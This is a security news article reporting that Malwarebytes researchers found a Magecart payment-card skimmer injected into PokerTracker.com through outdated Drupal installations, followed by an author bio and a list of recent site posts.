Chips are down: PokerTracker.com hit by Magecart hackers

A popular website that poker players utilize to improve their game via statistical data has come under attack. The website in question, PokerTracker.com, was discovered to be under assault by a Magecart script that seeks to steal payment card data. Malwarebytes researchers were the first to uncover the situation when a user reported suspicious activity to the Malwarebytes forums. Magecart is believed to be responsible for several previous high-profile hacks.

In the exchange, which can be found here, the user smokingjoker reports that his Malwarebytes software blocked domain traffic to ajaxclick.com. The data that smokingjoker provided showed PokerTracker.com displaying outbound traffic to the IP address 172.93.103.194 which resolved to port 50426. As the staff member AdvancedSetup stated in response, “ajaxclick[.]com is a domain that hosts a credit card skimmer. Skimmers are pieces of code that can steal credit card details from unaware online shoppers. What is unusual in your case is the fact that this is a poker application that attempts to connect to this site, rather than your internet browser. However, this is not a false positive and we will keep blocking this site.”

According to the subsequent blog post on the incident, Malwarebytes states that the skimmer with Magecart code was specifically crafted to target PokerTracker.com. What led researchers to make this conclusion was the fact that “variable names match its input form fields,” and additionally, “the data portion of the skimmer script has the site’s name hardcoded as well.” Malwarebytes researchers state that an outdated sub-domain and root domain are to blame for the skimmer code injection. Specifically, the blog post notes that both domains are using Drupal version 6.3x, which has been verified to be outdated and highly vulnerable to these types of attacks. Researchers also noted their surprise when the Magecart code was found. The main reason is that skimmers, according to researchers, usually target vulnerabilities in Magento for Magecart attacks (rather than Drupal).

It seems that an up-to-date malware blocker will protect you against this skimming attack. Nevertheless, poker players should avoid PokerTracker.com for now until they update the Drupal version. The last thing you want is for hackers to have pocket aces before the flop while you are sitting with a 4 and 10 offsuit.

Featured image: Flickr/Matt Galisa

Derek Kortepeter

Derek Kortepeter is a graduate of UCLA and tech journalist that is committed to creating an informed society with regards to Information Security. Kortepeter specializes in areas such as penetration testing, cryptography, cyber warfare, and governmental InfoSec policy.

Share
Published by
Derek Kortepeter

Recent Posts

IFA 2019: All the top smartphone announcements and unveilings

IFA 2019, this year’s version of the annual consumer electronics trade show, did not disappoint. Is one of these smartphones…

57 mins ago

Outlook connectivity: Troubleshooting and solving common issues

IT professionals all dread getting this fevered message from employees and clients: “I’m having Outlook connectivity issues!” Here’s what you…

5 hours ago

Using tags with Azure runbook automation to control your costs

Here’s a script designed to start and stop virtual machines based on tags associated at the resource group level. It…

8 hours ago

Software-defined perimeter solutions: Why this is the future of security

Traditional VPNs are showing their age in the modern cloud-powered workplace. That’s why software-defined perimeter solutions are in your future.

3 days ago

Why you need to check your virtualization host’s NUMA configuration

Should you disallow NUMA spanning in your Hyper-V architecture? There are two sides to this story, and you’ll get both…

3 days ago

Getting started with Visual Studio Code and integrating with Azure DevOps

Coding may not be the No. 1 job duty for cloud admins, but it is often a part of the…

3 days ago